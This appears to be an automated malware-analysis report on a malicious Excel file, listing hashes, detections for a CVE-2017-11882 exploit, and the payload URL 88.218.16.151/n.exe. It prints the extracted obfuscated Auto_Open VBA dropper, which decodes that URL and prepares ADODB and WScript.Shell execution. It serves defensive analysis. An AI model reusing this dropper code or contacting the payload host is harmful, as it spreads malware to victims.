Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e3c4cf9fbd24e6bc…

MALICIOUS

Office (OOXML)

53.0 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-11-05
MD5: e03602b51023c8ea0edb529a62e9207a SHA-1: 23a4931d8227e09fa8156b568bbea4c658d70412 SHA-256: e3c4cf9fbd24e6bce1114aeb1877333fd44b744a4de0f5856fecad759f6936c3
452 Risk Score

Heuristics 12

  • CVE-2017-11882 — Equation Editor command stager critical CVE likely CVE_2017_11882_EQUATION_NATIVE_CMD
    Embedded Equation Editor OLE data contains an invalid Equation Native/MTEF stream with an embedded command stager. This is likely CVE-2017-11882 exploitation because the vulnerable Equation Editor component is reached and the malformed native stream directly carries process-launch bytes.
  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • ClamAV: Doc.Dropper.Detected-9977031-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Detected-9977031-0
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    re645rjfr6edcb = ""CreateObject""  'ZZ07" + vbLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://88.218.16.151/n.exe In document text (OOXML body / shared strings)

Extracted artifacts 11

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 38245 bytes
SHA-256: 5c103b8b4d15dfa320d6d4c045581e63cc3e99a220b7ed20acd1633b346e6884
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub SortSheetsTabName()
Application.ScreenUpdating = False
Dim ShCount As Integer, i As Integer, j As Integer
ShCount = Sheets.Count
For i = 1 To ShCount - 1
For j = i + 1 To ShCount
If Sheets(j).Name < Sheets(i).Name Then
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
Sheets(j).Move before:=Sheets(i)
End If
Next j
Next i
Application.ScreenUpdating = True
End Sub

Sub gjhtghjmk()
Dim ws As Worksheet
Dim sdlduyetjgbh435t As String
sdlduyetjgbh435t = "Test123" 'replace Test123 with the sdlduyetjgbh435t you want
For Each ws In Worksheets
    hournow = Hour(Time())
    If hournow < 30 Then
       ws.Protect sdlduyetjgbh435t:=sdlduyetjgbh435t
    End If
Next ws
End Sub

Sub mhytgg()
Dim ws As Worksheet
Dim password As String
password = "Test123" 'replace Test123 with the password you want
For Each ws In Worksheets
ws.Unprotect password:=password
Next ws
End Sub


Attribute VB_Name = "Module2"

Sub AddSerialNumbers()
Dim i As Integer
On Error GoTo Last
i = InputBox("Enter Value", "Enter Serial Numbers")
For i = 1 To i
ActiveCell.Value = i
ActiveCell.Offset(1, 0).Activate
Next i
Last: Exit Sub
End Sub
Sub HideSubtotals()
Dim pt As PivotTable
Dim pf As PivotField
On Error Resume Next
Set pt = ActiveSheet.PivotTables(ActiveCell.PivotTable.Name)
If pt Is Nothing Then
MsgBox "You must place your cursor inside of a PivotTable."
Exit Sub
End If
For Each pf In pt.PivotFields
pf.Subtotals(1) = True
pf.Subtotals(1) = False
pf.Subtotals(1) = False
Next pf
End Sub
Sub Auto_Open()
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "vrh5kryyj4kiwq6ui = ""bhju43h3uhiweokwgui4gukf4yugwEHJWERREGIH4FH874EUFWEHYUihruihrejigmg4b43y7u437843oji43ikotj43rfwet4345gy54yergt4e5tg3w54yt3""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "vrh5kryyj4kiwq6ui = ""111aHRUcDovLzg4LjIxOC4xNi4xNTEvbi5leGU="" " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "vrh5kryyj4kiwq6ui = Mid(vrh5kryyj4kiwq6ui, 4)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "uiytvdverwt67fhrey =""111bXN3b3Jkcy5leGU=""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "uiytvdverwt67fhrey = Mid(uiytvdverwt67fhrey, 4)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = ""b""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""in""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""."" " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""ba""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""se6""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""4"" " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "dim cftcfrfcfrfcfr, path" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "cftcfrfcfrfcfr = ""later""  'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "dim epsykevy3idfey, f33rZ9jPUDsN6B81P6yiLKJOeonZe6SzDGNsnxCSWrBHVHl05Pv1X2HnSigPIgPi1gXpEXCLMR9yRsmGCj3nhjVAL8Rfq4oW3eTt0EboqxgdqF" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "cftcfrfcfrfcfr = ""later""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Sub juytd098ei3lkdu8(vdg2, rgr3he) " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Dim vvfebtrfdhbtrdfg, oriutoiuy87t34gr4y367, hyuifiuygwhjekriu" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    if rgr3he Then vvfebtrfdhbtrdfg = ""utf-16le"" Else vvfebtrfdhbtrdfg = ""utf-8""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    re645rjfr6edcb = ""CreateObject""  'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    leftieiehtegy33gy = ""(""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    rightieiehtegy33gy = "")""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    quoieiehtegy33gy = """"""""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = ""Ms""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""xm""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""l2""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + "".D""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""OM""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""Document""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = "".Cr""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""eate""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""Ele""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""ment""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""(""""a""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""ux"""")""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    yehrfjdks = ""s""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    bgfcvbhgfd = ""e"" + ""t lsksjegefectvvjdk"" + "" = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    yehrfjdks = yehrfjdks + bgfcvbhgfd" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    yehrfjdks = yehrfjdks + re645rjfr6edcb + leftieiehtegy33gy + quoieiehtegy33gy + jbhgyuf7y8uiokjh + quoieiehtegy33gy + rightieiehtegy33gy + o9u7hgtyuei983jh" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(yehrfjdks) " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    lsksjegefectvvjdk.DataType = bgfjeryhj57r6uj55jry6jr 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    lsksjegefectvvjdk.Text = vdg2" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = ""ADODB"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = aaax + ""."" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = aaax + ""Stream"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    novarue = ""Node""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    nvceuwkbfweu = ""novarue = novarue + """"TypedValue""""""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(nvceuwkbfweu)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    wwityetygehrer = ""ieeeeeeeeehhhhhfgfg"" + "" = lsksjegefectvvjdk."" + novarue" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(wwityetygehrer)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    If LCase(vvfebtrfdhbtrdfg) = ""utf-16le"" then " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   epsykevy3idfey = CStr(ieeeeeeeeehhhhhfgfg)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Else" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   epsykevy3idfey = CStr(ieeeeeeeeehhhhhfgfg)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    re645rjfr6edcb = ""Create""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    re645rjfr6edcb = re645rjfr6edcb + ""Object""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    veuriieug34jr = ""Set baax = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    veuriieug34jr = veuriieug34jr + re645rjfr6edcb + ""(aaax)""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(veuriieug34jr) 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    djdufyfe67u3yhu = ""baax.Type = 1:baax."" + ""Open:baax.Wr"" + ""ite ieeeeeeeeehhhhhfgfg""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(djdufyfe67u3yhu)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    baax.Position = 0" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    baax.Type = 2 ' adTypeText" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    baax.CharSet = vvfebtrfdhbtrdfg" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    epsykevy3idfey = baax.ReadText" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    baax.Close" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    End If" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "end sub" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Sub kjjjjjjjjjjjjjjjjjj(vdg2, rgr3he)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Dim vvfebtrfdhbtrdfg " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    if rgr3he Then vvfebtrfdhbtrdfg = ""utf-16le"" Else vvfebtrfdhbtrdfg = ""utf-8"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & " " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    re645rjfr6edcb = ""CreateObject""  'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    leftieiehtegy33gy = ""(""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    rightieiehtegy33gy = "")""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    quoieiehtegy33gy = """"""""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = ""Ms""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""xm""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""l2""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + "".D""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""OM""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jbhgyuf7y8uiokjh = jbhgyuf7y8uiokjh + ""Document""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = "".Cr""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""eate""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""Ele""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""ment""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""(""""a""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    o9u7hgtyuei983jh = o9u7hgtyuei983jh + ""ux"""")""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    jiwgft7hgyf367r = ""Set lsksjegefectvvjdk = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(jiwgft7hgyf367r + re645rjfr6edcb + leftieiehtegy33gy + quoieiehtegy33gy + jbhgyuf7y8uiokjh + quoieiehtegy33gy + rightieiehtegy33gy + o9u7hgtyuei983jh) " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    lsksjegefectvvjdk.DataType = bgfjeryhj57r6uj55jry6jr" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    lsksjegefectvvjdk.Text = vdg2 " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = ""ADODB"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = aaax + ""."" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    aaax = aaax + ""Stream"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    novarue = ""Node""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(""novarue = novarue + """"TypedValue"""""")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(""ieeeeeeeeehhhhhfgfg = lsksjegefectvvjdk."" + novarue) 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "If LCase(vvfebtrfdhbtrdfg) = ""utf-16le"" then" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "f33rZ9jPUDsN6B81P6yiLKJOeonZe6SzDGNsnxCSWrBHVHl05Pv1X2HnSigPIgPi1gXpEXCLMR9yRsmGCj3nhjVAL8Rfq4oW3eTt0EboqxgdqF = CStr(ieeeeeeeeehhhhhfgfg)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Else" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "re645rjfr6edcb = ""creat""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "re645rjfr6edcb = re645rjfr6edcb + ""eob""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "re645rjfr6edcb = re645rjfr6edcb + ""je""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "re645rjfr6edcb = re645rjfr6edcb + ""ct""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "ksjdfuihrege9ur = ""Set baax = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Execute(ksjdfuihrege9ur + re645rjfr6edcb + ""(aaax)"") " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "baax.Type = 1 ' adTypeBinary 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Execute(""baax."" + ""Open"") " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Execute(""baax."" + ""Write ieeeeeeeeehhhhhfgfg"")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "baax.Position = 0 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "baax.Type = 2 ' adTypeText" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "baax.CharSet = vvfebtrfdhbtrdfg" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Execute(""f33rZ9jPUDsN6B81P6yiLKJOeonZe6SzDGNsnxCSWrBHVHl05Pv1X2HnSigPIgPi1gXpEXCLMR9yRsmGCj3nhjVAL8Rfq4oW3eTt0EboqxgdqF = baax."" + ""ReadText"") " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "baax.Close" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "End If" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "end sub" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Execute(""call "" + ""juytd098ei3lkdu8(uiytvdverwt67fhrey,False)""):call kjjjjjjjjjjjjjjjjjj(vrh5kryyj4kiwq6ui,False) " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "Sub xdecd( dfgerge, vcvxcv )" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   cobvar = ""Scripting."" + ""FileSystemObject""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "didtjw63jdt20 = ""cre""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "didtjw63jdt20 = didtjw63jdt20 + ""ate""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "didtjw63jdt20 = didtjw63jdt20 + ""ob""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "didtjw63jdt20 = didtjw63jdt20 + ""je""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "didtjw63jdt20 = didtjw63jdt20 + ""ct""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   dud765tyie = ""t fso = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(""Se"" + dud765tyie + didtjw63jdt20 + ""(cobvar) "")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   path = ""C""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   path = path + "":""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   path = path + ""\program""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(""path = path + """"data\asc"""" + """"."""" + """"txt"""""")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(""gybghbgyh = fso."" + ""File"" + ""Exists(path)"")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   If(gybghbgyh) Then" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      Execute(""fso.DeleteFile(path)"") 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      msg = path & "" exists.""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      Execute(""gtyjnhjkfirejhrrhy=dfgerge:uytrfghjhfrtyhgf=vcvxcv"") " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      mkdfuiqwoer843 = ""W""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      mkdfuiqwoer843 = mkdfuiqwoer843 + ""Scr""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       mkdfuiqwoer843 = mkdfuiqwoer843 + ""ipt.""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       m = mkdfuiqwoer843 + ""Sh""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       varforell = ""e"" + ""l""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       varforell = varforell + Right(varforell, 1)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       m = m + varforell 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       Execute(""l=m"")  'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       vnjdhygfwdgw67f = ""Set vic5vuvvyerfr5g3y = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       vnjdhygfwdgw67f = vnjdhygfwdgw67f + didtjw63jdt20" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       vnjdhygfwdgw67f = vnjdhygfwdgw67f + ""(l)""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "       Execute(vnjdhygfwdgw67f)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Else" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "      msg = path & "" doesn't exist.""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   End If" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Dim i, objFile, objFSO, mkdfuiqwoer843, strFile, strMsg" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Const ForReading = 1, ForWriting = 2, ForAppending = 8 " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    slashy = ""/""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    vfyf88ruy3t73tf = ""Set objFSO = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    vfyf88ruy3t73tf = vfyf88ruy3t73tf + didtjw63jdt20" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    vfyf88ruy3t73tf = vfyf88ruy3t73tf + ""(cobvar) """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(vfyf88ruy3t73tf)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(""ggfffffffffggggggg = objFSO.Folder"" + ""Exists(uytrfghjhfrtyhgf)"")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(""hdlkvgbfndm = objFSO.Folder"" + ""Exists( Left( uytrfghjhfrtyhgf, "" + ""InS"" + ""trRev"" + ""( uytrfghjhfrtyhgf, """"\"""" ) - 1 ) )"")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    If(ggfffffffffggggggg) Then" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        fje4ue783hu73 = ""Path(""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        fje4ue783hu73 = fje4ue783hu73 +  ""gtyjnhjkfirejhrrhy, "" + ""InS"" + ""trRev"" + ""( gtyjnhjkfirejhrrhy, slashy ) + 1 ) )""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        obvrva = "" = objFSO""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        Execute(""strFile"" + obvrva + ""."" + ""Build"" + fje4ue783hu73) 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    ElseIf(hdlkvgbfndm) Then" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        strFile = uytrfghjhfrtyhgf" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Else" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "        Exit Sub" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    End If" + vbLf
